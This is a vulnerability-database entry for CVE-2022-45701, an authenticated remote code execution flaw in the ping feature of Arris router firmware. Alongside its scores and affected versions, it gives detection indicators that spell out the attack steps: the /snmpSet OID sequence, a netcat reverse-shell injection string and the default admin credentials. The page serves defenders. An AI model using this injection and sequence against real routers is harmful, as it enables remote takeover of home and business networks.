cbcvebase.
CVE-2022-45701
published 2023-02-17

CVE-2022-45701: Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.

PriorityP275high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
45.31%
98.6th percentile
Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.

Affected

3 ranges
VendorProductVersion rangeFixed in
commscopearris_sbg10_firmware<= 9.1.103
commscopearris_tg2482a_firmware<= 9.1.103
commscopearris_tg2492_firmware<= 9.1.103

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://192.168.0.1/login
urlhttp://192.168.0.1/snmpSet
cookiecredential=<base64-auth-token>
command$(nc%20<lhost>%20<lport>%20-e%20/bin/sh)
other1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;
other1.3.6.1.4.1.4115.1.20.1.1.7.2.0=<payload>;4;
other1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;
other1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;
other1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;
other1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;
  • Monitor HTTP GET requests to /snmpSet endpoint on Arris routers with OID parameters from the 1.3.6.1.4.1.4115.1.20.1.1.7.* subtree, especially OID .7.2.0 containing shell metacharacters or URL-encoded command injection strings (e.g., %20-e%20/bin/sh).
  • Detect HTTP GET requests to /login with an 'arg' query parameter containing a base64-encoded credential string, followed immediately by requests to /snmpSet with a 'credential' cookie — this sequence is characteristic of the exploit authentication flow.
  • Alert on URL-encoded netcat reverse shell patterns in HTTP query parameters targeting router management interfaces: look for 'nc%20' combined with '%20-e%20/bin/sh' in GET request URIs.
  • Flag sequential SNMP-over-HTTP SET operations to OIDs 1.3.6.1.4.1.4115.1.20.1.1.7.1.0 through .9.0 in rapid succession via GET /snmpSet, as this is the exact OID sequence used to arm and trigger the ping-based RCE.
  • ·The exploit requires prior authentication (valid admin credentials). The default credentials used in the PoC are admin:password — deployments using default credentials are immediately exploitable.
  • ·The exploit was tested against multiple Arris device models (TG2482A, TG2492, SBG10), so detection rules should not be scoped to a single model.
  • ·The RCE is delivered via the router's ping utility feature through SNMP OID manipulation over HTTP, not through a traditional SNMP UDP port — network-layer SNMP filtering alone will not block this attack vector.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.